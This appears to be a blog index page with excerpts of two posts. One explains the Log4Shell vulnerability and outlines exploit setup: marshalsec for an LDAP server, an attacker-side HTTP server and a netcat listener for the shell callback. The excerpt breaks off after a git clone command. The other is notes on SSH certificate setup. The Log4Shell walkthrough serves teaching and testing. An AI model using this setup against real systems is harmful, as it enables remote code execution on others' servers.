Skip to content

2024

  • 2 min read

Log4Shell

Log4j

Background

The Log4j vulnerability is a critical security flaw that gained widespread attention in December 2021. The exploitation of the vulnerability is often called Log4Shell as it is used to gain shell access. Log4j is a logging framework that developers use to record activity within their applications. It's part of the Apache Logging Services and the library is known for its performance and flexibility, offering various logging capabilities that have become essential in software development.

The exploit takes advantage of the way Log4j processes log messages by misusing the library's Java Naming and Directory Interface (JNDI) feature. JNDI is an API in Java that allows Java software clients to look up data and resources (such as objects) via a name. The exploit occurs when a maliciously crafted log message triggers a JNDI lookup to an attacker-controlled server, leading to the execution of arbitrary code.

Process

There are a great many applications that rely on Log4j, but one of the most notable is Apache. Once you have identified a service that is vulnerabile, you can set up testing. Testing means getting an ldap server running to handle deserialization of the exploit which you can do through the referenced repo's .jar file. You then set up an http server on the attacker host as a means of delivering the exploit. You'll also have a netcat listener set up to receive the callback once the JNDI logging executes the exploit.

What does that actually look like?

  1. First grab tools. 

    git clone https://github.com/mbechler/marshalsec

    cd marshalsec && ls
  • 8 min read

Setting Up SSH Certificates

This year, I completed SANS Institute and Counter Hack's Holiday Hack Challenge. One of the speakers, Thomas Bouve, provided an excellent talk about SSH Certificates. Below are my step-by-step notes that I documented as a reference. I strongly encourage anyone interested in the topic to listen to the presentation as Thomas provides more foundational knowledge in the beginning of the video and provides more context and explanations than what I am providing here. But if you're looking for a quick copy/paste/edit of commands to get the job done, this might be a helpful reference.

secure

Notes & Assumptions
  • In the example, 10.10.10.10 is the address of the server where we want to be able to SSH with a signed certificate.
  • The username, jesinia will be used to SSH into the server.
  • It is assumed that the server is rootless and that jesinia has sudo permissions on the server. If you have root access, then feel free to ignore the "sudo" references.
  • Commands for restarting ssh service are for Fedora or RedHat distributions. If you use a different flavor of Linux, your commands may be different for that portion.
  • I use vim, but you can use whichever text editor you prefer.
  • Notes and level of detail is purposely for a broader audience with less experience.

1. Log into Server Using Password

In Server Terminal:
ssh [email protected]
What is happening here?

This command is simply logging in and if there is a password required, you will be prompted to enter it.